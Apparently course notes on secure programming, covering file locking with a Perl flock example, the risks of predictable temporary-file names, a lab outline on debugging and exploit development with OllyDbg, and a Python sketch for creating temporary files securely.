  o Most common technique is to acquire a lock on the shared file
• Lockfile
  o Process must create and own the lockfile in order to gain access to the shared resource
  o Concerns
    • If a program chooses to ignore the existence of the lockfile and access the shared resource the system will not prevent this
    • All programs using this form of synchronization must cooperate
    • Implementation

#!/usr/bin/perl
#
$EXCL_LOCK = 2;
$UNLOCK = 8;
$FILENAME = "forminfo.dat";
# open data file and acquire exclusive access lock
open (FILE, ">> $FILENAME") || die "Failed to open $FILENAME \n";
flock FILE, $EXCL_LOCK;
# … use exclusive access to the forminfo file to save details
# unlock and close file
flock FILE, $UNLOCK;
close(FILE);
Figure 11.8 Perl File Locking Example

• Many programs use temporary files
• Often in common, shared system area
• Must be unique, not accessed by others
• Commonly create name using process ID
  o Unique, but predictable
  o Attacker might guess and attempt to create own file between program checking and creating
• Secure temporary file creation and use requires the use of random names

• Programs may use functionality and services of other programs
  o Security vulnerabilities can result unless care is taken with this interaction
  o Such issues are of particular concern when the program being used did not adequately identify all the security concerns
that might arise
  o Occurs with the current trend of providing Web interfaces to programs
  o Burden falls on the newer programs to identify and manage any security issues that may arise
• Issue of data confidentiality/integrity
• Detection and handling of exceptions and errors generated by interaction is also important from a security perspective

The lab
• 4. Debugging and Exploit Development
  • 4.1 Debugging Fundamentals
    • 4.1.1 Opening and Attaching to the debugging target application
    • 4.1.2 The OllyDbg CPU view
    • 4.1.3 The 20 second guide to X86 assembly language for exploit writers
  • 4.2 Exploit Development with OllyDbg
    • 4.2.1 Methods for directing code execution in the debugger
    • 4.2.2 The SEH Chain
    • 4.2.3 Searching for commands
    • 4.2.4 Searching through memory
    • 4.2.5 Working in the memory dump
    • 4.2.6 Editing code, memory and registers
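
Sketch: secure temporary file creation
The temporary file notes in this week's material say that names built from the process ID are predictable, and that an attacker may create their own file between the program checking for the name and creating it. The Python sketch below is one possible way to address both points, not code from the course: it picks a random name and asks the operating system to create the file only if it does not already exist, in a single step. The helper name create_private_temp and the "app-" prefix are hypothetical and used only for illustration.

```python
import os
import secrets


def create_private_temp(directory, prefix="app-"):
    """Create a new file with an unpredictable name; return (fd, path).

    Hypothetical helper for illustration only.
    """
    for _ in range(100):  # retry in the very unlikely case of a name collision
        # Random name: cannot be guessed the way a process ID can.
        path = os.path.join(directory, prefix + secrets.token_hex(16))
        try:
            # O_CREAT | O_EXCL makes "check that the name is unused" and
            # "create the file" one atomic operation, so there is no gap
            # between checking and creating for an attacker to exploit.
            fd = os.open(path, os.O_RDWR | os.O_CREAT | os.O_EXCL, 0o600)
        except FileExistsError:
            continue  # name already taken: pick another random name
        return fd, path
    raise FileExistsError("could not create a unique temporary file")
```

Usage: call fd, path = create_private_temp("/tmp"), write through fd with os.write, then os.close(fd) and os.remove(path) when finished. In practice Python's standard tempfile.mkstemp provides the same random-name, exclusive-create behaviour and would normally be preferred over a hand-written helper.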